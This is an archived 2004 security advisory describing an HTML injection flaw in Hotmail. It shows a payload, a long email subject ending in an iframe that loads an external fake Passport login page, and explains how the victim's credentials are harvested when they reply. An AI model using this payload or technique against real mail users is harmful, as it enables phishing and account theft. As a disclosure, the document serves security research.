what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

hotmailfun.txt

hotmailfun.txt
Posted Mar 19, 2004
Authored by http-equiv | Site malware.com

Some amusing flaws in Hotmail.com allows for credential theft.

tags | advisory
SHA-256 | 36c149ffb66c8fd45646c4c58eb4976dbea678cc3ed3634af594e00d8731dca8

hotmailfun.txt

Change Mirror Download


Thursday, March 18, 2004

Unbelievably ridiculous insertion of arbitrary html into the
Hotmail web based email account of your targeted "buddy".

In order to gain your "little pal's" credentials, simply send
him or her an email with an extra long subject like so:

heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddyheylittlebuddyheylittlebuddy
heylittlebuddyheylittlebuddyheylittlebuddyheylittlebuddyheylittle
buddy<iframe src="https://www.malware.com/pithy.html">

Where our iframe points to window.open along with our trojanised
passport re-sign in page. When your "chum" replies to your
email, our iframe is rendered out of sight in the message body
of the email and up goes our error window requesting him to
login again. Only this time he'll be sending you his credentials.

Notes:

1. this is too pathetic for words. Cursory checking of all
settings in hotmail 'reply to' suggests there is no de-
activation of html email when composing a reply.
2. consideration was given to informing the owner of this
particular web based mail service of this particular issue
however we have not used such a poor service in recent years. So
much so one can only suspect that such a slovenly operation is
intentional in order to force account users to upgrade to the
pay service:

a) as of three hours from time of writing we are still awaiting
receipt of emails into the hotmail account from eight [that's
numeral 8] different mail servers. Internal mail messages are
instant, but three hours for external is completely unacceptable.
b) constant 'server is busy' errors. What does 40 billion
dollars buy you today. More acreage around your acreage for more
privacy.
b) initiation and re-activation of a dormant account of the free
webmail account from the owner of this particular web based mail
service requires a magnifying glass to see. if you don't have
one, you're liable to select the pay for service as it appears
there are no other choices.
c) use yahoo mail. Instant receipt of emails from any mail
server all the time. Reply to html email subject filters tags.

End Call

--
https://www.malware.com



Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close